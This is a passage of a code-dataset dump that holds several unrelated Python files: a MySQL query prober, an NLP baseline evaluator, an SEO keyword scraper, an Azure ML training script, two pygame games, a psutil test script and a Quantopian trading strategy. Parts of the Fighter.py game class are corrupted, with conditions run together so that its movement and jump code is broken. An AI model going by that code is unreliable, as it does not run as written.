result_packer(i, statusResp1, statusResp2, explainResp, profileResp, statusTime, queue):\n result = {}\n content = {}\n\n dictStatus = parseStatus(statusResp1, statusResp2, statusTime)\n content = dictStatus\n\n dictExplain = parseExplain(explainResp)\n content['timestamp'] = time.time()\n content['plan'] = dictExplain['plan']\n content['rowScan'] = dictExplain['rowsScan']\n content['rowOut'] = dictExplain['rowsOut']\n \n dictProfile = 
parseProfile(profileResp)\n content['totalTime'] = dictProfile['totalTime']\n content['lockTime'] = dictProfile['System lock']\n content['startTime'] = dictProfile['starting']\n content['transHookTime'] = dictProfile['Executing hook on transaction ']\n content['oTableTime'] = dictProfile['Opening tables']\n content['initTime'] = dictProfile['init']\n\n content['optimizeTime'] = dictProfile['optimizing']\n content['statTime'] = dictProfile['statistics']\n content['prepareTime'] = dictProfile['preparing']\n content['execTime'] = dictProfile['executing']\n content['endTime'] = dictProfile['end']\n content['qEndTime'] = dictProfile['query end']\n content['commitTime'] = dictProfile['waiting for handler commit']\n content['rmTmpTime'] = dictProfile['removing tmp table']\n content['crTmpTime'] = dictProfile['Creating tmp table']\n content['cTableTime'] = dictProfile['closing tables']\n content['freeTime'] = dictProfile['freeing items']\n content['cleanTime'] = dictProfile['cleaning up']\n\n result['id'] = i\n result['content'] = content\n queue.put(result)\n\n\n# 把result字典保存至num对应的文件/数据库中\ndef save_result(queue):\n logger.info(\"Probe Writer Started!!\")\n while True:\n try:\n result = queue.get()\n cont_id = result['id']\n cont = result['content']\n filename = config.config.PROBE_FILE_PREFIX + str(cont_id) + config.config.PROBE_FILE_SUFFIX\n cont_in = []\n for rowname in headers:\n try:\n temp = cont[rowname]\n except KeyError:\n temp = ''\n cont_in.append(temp)\n # logger.debug(cont_in)\n with open(filename, 'a') as f:\n f_csv = csv.writer(f)\n f_csv.writerow(cont_in)\n except KeyboardInterrupt:\n logger.warn(\"Probe Writer Terminated!!\")\n break\n\n\n# 定期执行相应的\ndef workflow_probe(i, queue):\n counter = 0\n while True:\n try:\n process = multiprocessing.Process(target=probe, args=(i, queue, ))\n process.start()\n counter = counter + 1\n logger.info(\"Probe of query \" + str(i) + \" has been executed for \" + str(counter) + \" times.\")\n time.sleep(config.config.PROBE_INTERNAL_TIME)\n except KeyboardInterrupt:\n process.terminate()\n logger.warn(\"Probe of Query \"+ str(i) +\" Terminated!!\")\n break\n\n\n# 根据probe-list,调用相应的work-flow-probe,并管理各个workflow优雅退出。\ndef probe_monitor():\n record = []\n flag = True\n queue = multiprocessing.Queue()\n processW = multiprocessing.Process(target=save_result, args=(queue, ))\n processW.start()\n record.append(processW)\n for i in range(len(PROBE_SQL_LIST)):\n # 初始化对应的csv文件\n filename = config.config.PROBE_FILE_PREFIX + str(i) + config.config.PROBE_FILE_SUFFIX\n with open(filename, 'w') as f:\n f_csv = csv.writer(f)\n f_csv.writerow(headers)\n # 启动workflow\n process = multiprocessing.Process(target=workflow_probe, args=(i, queue, ))\n process.start()\n record.append(process)\n logger.info(\"Prober of Query \"+ str(i) + \" started!\")\n try:\n time.sleep(config.config.PROBE_TIME_BETWEEN_SQL)\n except KeyboardInterrupt:\n queue.close()\n for p in record:\n p.terminate()\n p.join()\n time.sleep(0.01)\n logger.warn(\"Probe Monitor Terminated!!\")\n flag = False\n break\n while flag:\n try:\n time.sleep(1)\n except KeyboardInterrupt:\n queue.close()\n for p in record:\n p.terminate()\n p.join()\n time.sleep(0.01)\n break\n \n logger.warn(\"Probe Monitor Terminated!!\")\n","sub_path":"YCSB/prober/mysqlprober.py","file_name":"mysqlprober.py","file_ext":"py","file_size_in_byte":19633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"586467748","text":"from __future__ import absolute_import\nfrom __future__ 
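The long `parseStatus` function above repeats the same subtraction dozens of times. Since both snapshots come from `SHOW GLOBAL STATUS` as rows of `{'Variable_name': ..., 'Value': ...}`, the same result can be computed from two key lists. This is a refactoring sketch, not the prober's actual code; the key lists are abbreviated:

```python
def parse_status(snap1, snap2, elapsed):
    """Compute counter deltas between two SHOW GLOBAL STATUS snapshots."""
    before = {row['Variable_name']: row['Value'] for row in snap1}
    after = {row['Variable_name']: row['Value'] for row in snap2}
    delta_keys = ['Queries', 'Bytes_sent']    # counters: report the change
    absolute_keys = ['Innodb_page_size']      # gauges: copy as-is
    status = {k: int(after[k]) - int(before[k]) for k in delta_keys}
    status.update({k: int(after[k]) for k in absolute_keys})
    status['status_time'] = elapsed
    return status

snap1 = [{'Variable_name': 'Queries', 'Value': '100'},
         {'Variable_name': 'Bytes_sent', 'Value': '5000'},
         {'Variable_name': 'Innodb_page_size', 'Value': '16384'}]
snap2 = [{'Variable_name': 'Queries', 'Value': '130'},
         {'Variable_name': 'Bytes_sent', 'Value': '9000'},
         {'Variable_name': 'Innodb_page_size', 'Value': '16384'}]
print(parse_status(snap1, snap2, 0.5))
```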
import print_function\n\nimport logging\nimport time\nfrom itertools import chain\nfrom collections import Counter\n\nimport numpy as np\nimport tensorflow as tf\nfrom six.moves import range, reduce\nfrom sklearn import metrics\n\nfrom data_utils import load_data\n\n\ntimestamp = str(int(time.time()))\n\ntf.flags.DEFINE_string(\"baseline\", \"corpus\", \"corpus or context\")\ntf.flags.DEFINE_string(\"data\", \"cbt\", \"The data set (i.e., CBT, SQuAD).\")\ntf.flags.DEFINE_float(\"training_percentage\", 1.0, \"The percentage of the training data set to use.\")\ntf.flags.DEFINE_float(\"testing_percentage\", 1.0, \"The percentage of the testing data set to use.\")\ntf.flags.DEFINE_string(\"memory_representation\", \"sentence\", \"Memory representation of memory (i.e., sentence, window).\")\ntf.flags.DEFINE_integer(\"window_size\", 5, \"Size of a memory slot in a window-level memory.\")\ntf.flags.DEFINE_boolean(\"allow_soft_placement\", True, \"Allow device soft device placement\")\ntf.flags.DEFINE_boolean(\"log_device_placement\", False, \"Log placement of ops on devices\")\ntf.flags.DEFINE_boolean(\"debug_mode\", False, \"Activate debug mode, which prints some info about the model.\")\n\nFLAGS = tf.flags.FLAGS\n\n# Verify the validity of given parameters\nassert FLAGS.data in ['cbt', 'squad', 'cnn'], 'Wrong input for data: {} given, cbt, squad or cnn expected.'.format(FLAGS.data)\nassert 0 < FLAGS.training_percentage <= 1, 'Wrong input for training_percentage: {} given, a value in (0 ; 1] expected.'.format(FLAGS.training_percentage)\nassert 0 < FLAGS.testing_percentage <= 1, 'Wrong input for testing_percentage: {} given, a value in (0 ; 1] expected.'.format(FLAGS.testing_percentage)\n\ndata_set = {'cbt': 'CBTest', 'squad': 'SQuAD', 'cnn': 'cnn'}\npath = \"results0/{}/xxx/\".format(data_set[FLAGS.data])\nlog_dir = path.replace('xxx', 'logs', 1)\n\n# Name of the logs file\nlog_file = \"{}log_{}.txt\".format(log_dir, timestamp)\n# Configuration of the logging system\nlogging.basicConfig(filename=log_file, level=logging.DEBUG, format='%(asctime)s %(message)s')\nlogger = logging.getLogger(__name__)\n\n# Name of the parameters file\nparam_output_file = \"{}params_{}.csv\".format(log_dir, timestamp)\n\nFLAGS._parse_flags()\nlogger.info(\"Parameters:\")\nwith open(param_output_file, 'w') as f:\n for attr, value in sorted(FLAGS.__flags.items()):\n line = \"{}={}\".format(attr.upper(), value)\n f.write(line + '\\n')\n logger.info(line)\n logger.info(\"\")\n\nlogger.info(\"Started Program\")\n\n# Data\ntrain, test = load_data(FLAGS.data,\n FLAGS.training_percentage, FLAGS.testing_percentage,\n FLAGS.memory_representation, FLAGS.window_size)\ndata = train + test\nn_test = len(test) / 4\n\nvocab = sorted(reduce(lambda x, y: x | y, (set(list(chain.from_iterable(s)) + q + c + a) for s, q, c, a in data))) # if FLAGS.data == 'cbt' else sorted(reduce(lambda x, y: x | y, (set(list(chain.from_iterable(s)) + q + a) for s, q, a in data)))\nif None in vocab:\n vocab.remove(None)\n\ntoken_counter = Counter(list(chain.from_iterable(list(list(chain.from_iterable(s)) + q + c + a) for s, q, c, a in data)))\n\npred = []\nif FLAGS.baseline == \"corpus\":\n for elem in test:\n tmp = []\n for w in elem[2]:\n tmp.append(token_counter[w])\n pred.append(elem[2][np.argmax(tmp)])\nelse:\n for elem in test:\n context_counter = Counter(list(list(chain.from_iterable(elem[0])) + elem[1] + elem[2] + elem[3]))\n tmp = []\n for w in elem[2]:\n tmp.append(context_counter[w])\n pred.append(elem[2][np.argmax(tmp)])\n\nlabels = [elem[3][0] 
for elem in test]\nif FLAGS.data == 'cbt':\n    word_types = {0: 'NE', 1: 'CN', 2: 'V', 3: 'P'}\n    for i in range(4):\n        acc = metrics.accuracy_score(labels[i*n_test:(i+1)*n_test], pred[i*n_test:(i+1)*n_test])\n        logger.info('Testing Accuracy ({0}): {1:.3f}'.format(word_types[i], acc))\nelse:\n    acc = metrics.accuracy_score(labels, pred)\n    logger.info('Testing Accuracy: {0:.3f}'.format(acc))\n","sub_path":"key_value_memory/baseline_models.py","file_name":"baseline_models.py","file_ext":"py","file_size_in_byte":4025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"150884064","text":"import urllib.request\nfrom bs4 import BeautifulSoup\nf=urllib.request.urlopen(urllib.request.Request(\"http://www.team4adventure.com/\",data=None,headers={ 'User-Agent': 'Mozilla/5.0(Macintosh; Intel Mac OS X 10_9_3)AppleWebKit/537.36(KHTML, like Gecko)Chrome/35.0.1916.47 Safari/537.36'}))\nsoup=BeautifulSoup(f.read().decode('utf-8'),\"html.parser\")\nfor script in soup([\"script\",\"style\"]):\n    script.extract()\ntext=soup.get_text()\nt=text.casefold()\nL=t.split()  # every word on the page, duplicates kept, used for density\nL1=list(set(L))  # unique words\nfile = open(\"F:\\\\PYTHON\\\\practice\\\\urlcontent.txt\",\"w\")\nfor w in L1:\n    file.write(w+'\\n')\nfile.close()\nwith open('urlcontent.txt') as f:\n    setline = set(f.read().split())\nwith open('team4adventure.txt') as f:\n    setign = set(f.read().split())\nresult = setline.intersection(setign)\nfor n in result:\n    print(n, round(((L.count(n)/len(L))*100), 2))\n","sub_path":"SEO Keyword Density Analyzer.py","file_name":"SEO Keyword Density Analyzer.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"374379309","text":"\"\"\"\nCopyright (C) Microsoft Corporation. All rights reserved.\n\nMicrosoft Corporation (“Microsoft”) grants you a nonexclusive, perpetual,\nroyalty-free right to use, copy, and modify the software code provided by us\n(\"Software Code\"). You may not sublicense the Software Code or any use of it\n(except to your affiliates and to vendors to perform work on your behalf)\nthrough distribution, network access, service agreement, lease, rental, or\notherwise. This license does not purport to express any claim of ownership over\ndata you may have shared with Microsoft in the creation of the Software Code.\nUnless applicable law gives you more rights, Microsoft reserves all other\nrights not expressly granted herein, whether by implication, estoppel or\notherwise.\n\nTHE SOFTWARE CODE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS\nOR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
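The density formula at the end of the analyzer is simply occurrences / total_words * 100. As a reusable helper using `collections.Counter` (faster than repeated `list.count` on large pages); the sample text is made up:

```python
from collections import Counter

def keyword_density(words, keywords):
    counts = Counter(words)
    total = len(words)
    return {k: round(counts[k] / total * 100, 2) for k in keywords}

words = "fish ammo fish rod fish".split()
print(keyword_density(words, {"fish", "rod"}))  # {'fish': 60.0, 'rod': 20.0}
```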
IN NO EVENT SHALL\nMICROSOFT OR ITS LICENSORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\nSPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\nPROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\nBUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER\nIN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\nARISING IN ANY WAY OUT OF THE USE OF THE SOFTWARE CODE, EVEN IF ADVISED OF THE\nPOSSIBILITY OF SUCH DAMAGE.\n\"\"\"\nfrom azureml.core.run import Run\nimport os\nimport argparse\nfrom sklearn.linear_model import Ridge\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.model_selection import train_test_split\nimport joblib\nimport json\n\n\ndef train_model(run, data, alpha):\n run.log(\"alpha\", alpha)\n run.parent.log(\"alpha\", alpha)\n reg = Ridge(alpha=alpha)\n reg.fit(data[\"train\"][\"X\"], data[\"train\"][\"y\"])\n preds = reg.predict(data[\"test\"][\"X\"])\n run.log(\"mse\", mean_squared_error(\n preds, data[\"test\"][\"y\"]), description=\"Mean squared error metric\")\n run.parent.log(\"mse\", mean_squared_error(\n preds, data[\"test\"][\"y\"]), description=\"Mean squared error metric\")\n return reg\n\n\ndef main():\n print(\"Running train.py\")\n\n parser = argparse.ArgumentParser(\"train\")\n parser.add_argument(\n \"--build_id\",\n type=str,\n help=\"The build ID of the build triggering this pipeline run\",\n )\n parser.add_argument(\n \"--model_name\",\n type=str,\n help=\"Name of the Model\",\n default=\"sklearn_regression_model.pkl\",\n )\n\n parser.add_argument(\n \"--step_output\",\n type=str,\n help=(\"output for passing data to next step\")\n )\n\n args = parser.parse_args()\n\n print(\"Argument [build_id]: %s\" % args.build_id)\n print(\"Argument [model_name]: %s\" % args.model_name)\n print(\"Argument [step_output]: %s\" % args.step_output)\n\n model_name = args.model_name\n build_id = args.build_id\n step_output_path = args.step_output\n\n print(\"Getting training parameters\")\n\n with open(\"config.json\") as f:\n pars = json.load(f)\n try:\n alpha = pars[\"training\"][\"alpha\"]\n except KeyError:\n alpha = 0.5\n\n print(\"Parameter alpha: %s\" % alpha)\n\n run = Run.get_context()\n\n # Get the dataset\n dataset = run.input_datasets['training_data']\n if (dataset):\n df = dataset.to_pandas_dataframe()\n X = df.drop('Y', axis=1).values\n y = df['Y'].values\n else:\n e = (\"No dataset provided\")\n print(e)\n raise Exception(e)\n\n X_train, X_test, y_train, y_test = train_test_split(\n X, y, test_size=0.2, random_state=0)\n data = {\"train\": {\"X\": X_train, \"y\": y_train},\n \"test\": {\"X\": X_test, \"y\": y_test}}\n\n reg = train_model(run, data, alpha)\n\n # Pass model file to next step\n os.makedirs(step_output_path, exist_ok=True)\n model_output_path = os.path.join(step_output_path, model_name)\n joblib.dump(value=reg, filename=model_output_path)\n\n # Also upload model file to run outputs for history\n os.makedirs('outputs', exist_ok=True)\n output_path = os.path.join('outputs', model_name)\n joblib.dump(value=reg, filename=output_path)\n\n # Add properties to identify this specific training run\n run.parent.tag(\"BuildId\", value=build_id)\n run.tag(\"BuildId\", value=build_id)\n run.tag(\"run_type\", value=\"train\")\n builduri_base = os.environ.get(\"BUILDURI_BASE\")\n if (builduri_base is not None):\n build_uri = builduri_base + build_id\n run.tag(\"BuildUri\", value=build_uri)\n run.parent.tag(\"BuildUri\", value=build_uri)\n print(f\"tags 
now present for run: {run.tags}\")\n\n run.complete()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"diabetes_regression/training/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"194931179","text":"#coding : utf-8\n\nimport pygame\nimport json\n\nsrcpath = \"./resource/\"\n\ndef now():\n return pygame.time.get_ticks() - startup_time\n\nclass music_sign(object):\n def __init__(self,img_path,channal=0,speed=5,showup_time=0):\n global channals\n global time\n\n self.surface = pygame.image.load(srcpath + img_path).convert()\n\n # 加入轨道\n self.channal = channal\n channals[channal].append(self)\n\n self.showup_time = showup_time\n\n # 位置,速度,状态\n self.y = 0\n self.x = channal * 100\n self.speed = speed\n # 实际速度(像素/秒) = self.speed * 帧率\n self.status = -2\n # 0 正在下落\n # -1 已经错过\n # 1 已经弹奏\n # 2 可被弹奏\n # -2 没有到出现时间\n\n def move(self):\n global startup_time\n if pygame.time.get_ticks() - startup_time >= self.showup_time:\n self.status = 0\n \n if self.status == -2:\n return False\n\n if self.y >= 768:\n self.status = -1\n elif self.y <= 600 and self.y >= 500:\n self.status = 2\n \n self.y += self.speed\n \n def show(self):\n if self.status >= 0:\n global screen\n screen.blit(self.surface,(self.x,self.y))\n\n\ndef create_sign_from_dict(d):\n return music_sign(\n img_path = d.get(\"img_path\"),\n channal = d.get(\"channal\"),\n speed = d.get(\"speed\"),\n showup_time = d.get(\"showup_time\"),\n )\n\ndef create_signs():\n # 开始设计\n # 实际速度(像素/秒) = self.speed * 帧率\n # showup_time单位为毫秒(1s = 1000ms)\n # channal以0开始,最高为7\n with open(\"./recorder/mus.json\",'r') as json_file:\n channals = json.load(json_file)\n for channal in channals:\n for sign in channal:\n create_sign_from_dict(sign)\n json_file.close()\n\nif __name__ == \"__main__\":\n score = 500 # 计分\n time = 0 # 计时\n\n # 初始化\n pygame.init()\n screen = pygame.display.set_mode((1024,768), 0, 32)\n pygame.display.set_caption(\"OMG MUSIC\")\n\n surface_background = pygame.image.load(srcpath+\"img/background.bmp\").convert()\n surface_line = pygame.image.load(srcpath+\"img/line.bmp\").convert()\n\n # 轨道(通道)\n channal0 = []\n channal1 = []\n channal2 = []\n channal3 = []\n channal4 = []\n channal5 = []\n channal6 = []\n channal7 = []\n channals = (channal0,channal1,channal2,channal3,channal4,channal5,channal6,channal7)\n\n # 加载音符\n create_signs()\n\n fps_clock = pygame.time.Clock()\n startup_time = pygame.time.get_ticks()\n\n # 主循环\n while True:\n fps_clock.tick(60)\n \n tuple_key =(\n pygame.K_a,\n pygame.K_s,\n pygame.K_d,\n pygame.K_f,\n pygame.K_g,\n pygame.K_h,\n pygame.K_j,\n pygame.K_k\n )\n\n # 处理输入\n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN:\n if event.key in tuple_key:\n channal_id = tuple_key.index(event.key)\n for sign in channals[channal_id]:\n if sign.status == 2:\n #可被弹奏\n sign.status = 1\n score += 20\n print(\"channal[%d]弹奏成功,sing.status=%d,分数=%d\" % (channal_id,sign.status,score))\n\n if event.type == pygame.QUIT:\n pygame.quit()\n exit()\n\n # 绘制背景\n screen.blit(surface_background,(0,0))\n screen.blit(surface_line,(0,600))\n\n # 绘制音符\n for channal in channals:\n for sign,i in zip(channal,range(len(channal))):\n # 检查是否没有被演奏\n if sign.status in (-1,1):\n print('移除了一个元素,原因:',sign.status)\n channal.pop(i)\n else:\n sign.show()\n sign.move()\n \n # 刷新屏幕\n pygame.display.update()\n print(\"Time:\",now(),\"FPS:\",fps_clock.get_fps(),end='\\r')\n\n# Todo\n# 连按慢速音符轨道导致多次计分\n# 
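Stripped of the Azure ML run-tracking plumbing, the model in `train.py` is a plain scikit-learn Ridge regression. A self-contained version of the train/evaluate core on synthetic data — the alpha value mirrors the config fallback, and since the data is random the printed MSE is only a smoke test, not a meaningful result:

```python
import numpy as np
from sklearn.linear_model import Ridge
from sklearn.metrics import mean_squared_error
from sklearn.model_selection import train_test_split

rng = np.random.default_rng(0)
X = rng.normal(size=(200, 3))
y = X @ np.array([1.5, -2.0, 0.5]) + rng.normal(scale=0.1, size=200)

X_train, X_test, y_train, y_test = train_test_split(
    X, y, test_size=0.2, random_state=0)

reg = Ridge(alpha=0.5)   # same default alpha as the config fallback
reg.fit(X_train, y_train)
print(mean_squared_error(reg.predict(X_test), y_test))
```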
会存在\\r引起的print的问题,不影响后续\n","sub_path":"OMGMusicGame/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"216979651","text":"import pygame\n\nclass Fighter(object):\n \n def __init__(self,x,y,width,height,OneOrTwo):\n self.x = x\n self.y = y\n self.width = width\n self.height = height\n self.vel = 7\n self.isJump = False\n self.isDown = False\n self.isSpecial = True\n self.jumpCounter = 10\n self.abaixado = y+height/3\n self.emPe = y\n self.walkCount = 0\n self.standCount = 0\n self.jumpCount = 0\n self.downCount = 0\n self.waiting = 0\n self.waitingSpecial = 0\n self.number = OneOrTwo\n self.walkChar = [pygame.image.load(str(OneOrTwo)+'/walk/w1.png'),pygame.image.load(str(OneOrTwo)+'/walk/w2.png'),pygame.image.load(str(OneOrTwo)+'/walk/w3.png'),pygame.image.load(str(OneOrTwo)+'/walk/w4.png'),pygame.image.load(str(OneOrTwo)+'/walk/w5.png'),pygame.image.load(str(OneOrTwo)+'/walk/w6.png'),pygame.image.load(str(OneOrTwo)+'/walk/w7.png'),pygame.image.load(str(OneOrTwo)+'/walk/w8.png'),pygame.image.load(str(OneOrTwo)+'/walk/w9.png')]\n self.standChar = [pygame.image.load(str(OneOrTwo)+'/stand/stand1.png'),pygame.image.load(str(OneOrTwo)+'/stand/stand2.png'),pygame.image.load(str(OneOrTwo)+'/stand/stand3.png'),pygame.image.load(str(OneOrTwo)+'/stand/stand4.png'),pygame.image.load(str(OneOrTwo)+'/stand/stand5.png'),pygame.image.load(str(OneOrTwo)+'/stand/stand6.png'),pygame.image.load(str(OneOrTwo)+'/stand/stand7.png')]\n self.jumpChar = [pygame.image.load(str(OneOrTwo)+'/jump/j1.png'),pygame.image.load(str(OneOrTwo)+'/jump/j2.png'),pygame.image.load(str(OneOrTwo)+'/jump/j3.png')]\n self.downChar = [pygame.image.load(str(OneOrTwo)+'/down/d1.png'),pygame.image.load(str(OneOrTwo)+'/down/d2.png'),pygame.image.load(str(OneOrTwo)+'/down/d3.png')]\n self.specialChar = [pygame.image.load(str(OneOrTwo)+'/special/s1.png'),pygame.image.load(str(OneOrTwo)+'/special/s2.png'),pygame.image.load(str(OneOrTwo)+'/special/s3.png'),pygame.image.load(str(OneOrTwo)+'/special/s4.png')]\n\n def moveLeft(self):\n \n if(self.x> self.vel): \n self.x-= self.vel\n if not self.isJump:\n self.y = self.emPe\n self.left = True\n self.ultimate = False\n self.right = False\n self.isDown = False\n \n\n def moveRight(self,modeWidth):\n \n if(self.x= -10:\n neg = 1\n if self.jumpCounter < 0 :\n neg = -1\n self.y-= (self.jumpCounter **2)*0.5*neg\n self.jumpCounter -=1 \n else:\n self.isJump = False\n self.jumpCounter = 10\n\n \n def special(self):\n if(self.isSpecial):\n self.isSpecial = False\n self.ultimate = True\n elif(self.waitingSpecial > 30):\n self.isSpecial = True\n self.waitingSpecial = 0\n self.ultimate = True\n else:\n self.ultimate = False \n \n\n \n \n def drawFighter(self,gameDisplay):\n \n if not (self.isJump):\n \n if not (self.isDown):\n if self.left :\n gameDisplay.blit(self.walkChar[self.walkCount%len(self.walkChar)],(self.x,self.y))\n self.waiting +=1\n self.standCount = 0\n self.jumpCount = 0\n if self.walkCount<0:\n self.walkCount = len(self.walkChar) - 1\n\n if self.waiting>1:\n self.walkCount-= 1\n self.waiting = 0\n\n elif self.right:\n gameDisplay.blit(self.walkChar[self.walkCount%len(self.walkChar)],(self.x,self.y))\n self.waiting +=1\n self.walkCount+= 1\n self.standCount = 0\n self.jumpCount = 0\n if self.waiting>1:\n self.walkCount-= 1\n self.waiting = 0\n \n elif (self.ultimate):\n contador = 0\n self.waiting = 0\n gameDisplay.blit(self.specialChar[contador],(self.x,self.y))\n 
while(self.waiting<100000):\n self.waiting += 1\n self.walkCount = 0\n self.jumpCount = 0\n \n if self.waiting == 20000 and contador1:\n self.standCount +=1\n self.waiting = 0\n \n else:gameDisplay.blit(self.downChar[2],(self.x,self.y))\n \n \n else: \n if self.jumpCount >= 0 and self.jumpCount < 5 :\n gameDisplay.blit(self.jumpChar[0],(self.x,self.y))\n elif self.jumpCount >= 5 and self.jumpCount <= 13:\n gameDisplay.blit(self.jumpChar[1],(self.x,self.y))\n elif self.jumpCount > 13 and self.jumpCount <= 20:\n gameDisplay.blit(self.jumpChar[0],(self.x,self.y))\n else : gameDisplay.blit(self.jumpChar[2],(self.x,self.y))\n \n self.jumpCount+=1","sub_path":"src/scratch/Fighter.py","file_name":"Fighter.py","file_ext":"py","file_size_in_byte":6702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"293058070","text":"import os\nimport psutil\nimport threading\n\n\ndef print_processes():\n for pid in psutil.pids():\n try:\n psutil.Process(pid).exe()\n except BaseException:\n pass\n\n\ndef print_count():\n print(\"start\")\n count = 0\n while True:\n count += 1\n print(count)\n\n\ndef write_file():\n fo = open(\"xxx.cmd\", \"w\")\n fo.write(\"helloworld111111\")\n fo.close()\n\n\ndef print_processes_per_sec():\n print_processes()\n timer = threading.Timer(1, print_processes_per_sec)\n timer.start()\n\n\nprint_count()\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"480669530","text":"\"\"\"\nStrategy \n1) セクターが違う銘柄を5つ\n2) 毎週月曜日の取引開始時間(米市場は09:30)前に,過去30日と10日平均の乖離から各銘柄を自己資金の何%Long��しくはShortするかを判断\n3) start日〜end日まで5銘柄保有する.\n\"\"\"\n\nimport pandas as pd \ndef initialize(context):\n\n # 業種の違う銘柄を適当に5つ選出\n # MSFT, HD, XOM, C, GE\n context.security_list = [sid(5061), sid(3496), sid(8347), sid(1335), sid(3149)]\n \n ## pandasのSeriesオブジェクトを用意.ログを出力用\n context.long_securities = pd.Series()\n context.short_securities = pd.Series()\n\n # 毎週月曜日(もしお休みなら,週明け最初の取引日)の,取引開始時(米09:30)にrebalanceを実行する.\n schedule_function(my_rebalance,\n date_rules.week_start(days_offset=0),\n time_rules.market_open())\n\n \n # 毎日取引終了時刻に,my_log,ログ出力\n schedule_function(my_log,\n date_rules.week_start(days_offset=0),\n time_rules.market_open())\n\n # 毎日取引終了時刻に,record_varsを実行して,描画\n schedule_function(my_record_vars,\n date_rules.every_day(),\n time_rules.market_close())\n \n\n \ndef compute_weights(context, data):\n \"\"\"\n それぞれの銘柄をどの程度保有するか,ウェイトを計算する\n \"\"\"\n # 5つの銘柄の過去30日分の終値を取得\n hist = data.history(context.security_list, 'price', 30, '1d')\n\n # 10日分/30日分の過去データをそれぞれ変数にいれる.\n prices_10 = hist.tail(10)\n prices_30 = hist\n\n # 平均を出す\n mean_10 = prices_10.mean()\n mean_30 = prices_30.mean()\n\n # 30日平均と10日平均の差が,30日平均と比べてどの程度違うのか.\n raw_weights = (mean_10 - mean_30) / mean_30\n\n # それぞれの銘柄を他の銘柄のraw_weightと比較して,ウェイトを作る.\n normalized_weights = raw_weights / raw_weights.abs().sum()\n\n # normalized_weightsがポジティブの場合は,ロング\n # normalized_weightsがネガティブの場合は,ショートする.\n # この情報を出力するために,contextに情報を入れる\n context.short_securities = normalized_weights[normalized_weights < 0].index\n context.long_securities = normalized_weights[normalized_weights > 0].index\n\n return normalized_weights # pandas.Series \n\ndef my_rebalance(context, data):\n \"\"\"\n rebalance: ポジション調整.\n\n \"\"\"\n normalized_weights = compute_weights(context, data)\n\n # 5銘柄をひとつずつ注文.\n for security in normalized_weights.index:\n # この銘柄が現在トレード出来るかどうか確認.\n if data.can_trade(security):\n # 
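The special-attack branch of Fighter.drawFighter above stalls the whole game with while(self.waiting<100000): self.waiting += 1 inside the draw call, a busy-wait whose duration also depends on CPU speed. The non-blocking pattern derives the animation frame from elapsed time; in pygame the clock would be pygame.time.get_ticks(). A minimal sketch with time.monotonic standing in, and an assumed 150 ms per frame:

# Sketch: pick a one-shot animation frame from elapsed time, no busy-wait.
import time

FRAME_MS = 150  # assumed per-frame duration, not from the original

def special_frame(start_ms, now_ms, n_frames):
    # Clamp at the last frame once the animation has finished.
    return min((now_ms - start_ms) // FRAME_MS, n_frames - 1)

start = int(time.monotonic() * 1000)
for _ in range(3):
    now = int(time.monotonic() * 1000)
    print(special_frame(start, now, 4))
    time.sleep(0.16)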
weight は pandas.Series なので,normalized_weights[security]でその銘柄のウェイトにアクセス出来る\n order_target_percent(security, normalized_weights[security])\n\ndef my_record_vars(context, data):\n \"\"\"\n 5銘柄それぞれ\n record():折れ線グラフを描画.5本まで.\n \"\"\"\n asset0 = context.security_list[0]\n asset1 = context.security_list[1]\n asset2 = context.security_list[2]\n asset3 = context.security_list[3]\n asset4 = context.security_list[4]\n \n # Record our variables.\n record(asset0.symbol, context.portfolio.positions[asset0].amount * data.current(asset0,'price'),\n asset1.symbol, context.portfolio.positions[asset1].amount * data.current(asset1,'price'),\n asset2.symbol, context.portfolio.positions[asset2].amount * data.current(asset2,'price'),\n asset3.symbol, context.portfolio.positions[asset3].amount * data.current(asset3,'price'),\n asset4.symbol, context.portfolio.positions[asset4].amount * data.current(asset4,'price'),\n )\n\ndef my_log(context, data): \n if context.long_securities.any():\n log.info(\"This week's longs: \" + \", \".join([long_.symbol for long_ in context.long_securities]))\n if context.short_securities.any():\n log.info(\"This week's shorts: \" + \", \".join([short_.symbol for short_ in context.short_securities]))\n\n ","sub_path":"algorithms/Tokyo Quantopian User Group Vol2 handson 5 stocks/backtests/Backtest 4-5a1f8870337ed745944c8821.py","file_name":"Backtest 4-5a1f8870337ed745944c8821.py","file_ext":"py","file_size_in_byte":4330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"150524881","text":"# As documented in the NRPy+ tutorial module\n# Tutorial-Psi4_tetrads_Ccode_function.ipynb,\n# this module construct the C code function\n# for generating the tetrads necessary for\n# computing \\psi_4 (as well as other\n# Weyl scalars and invariants in principle)\n\n# Author: Zachariah B. 
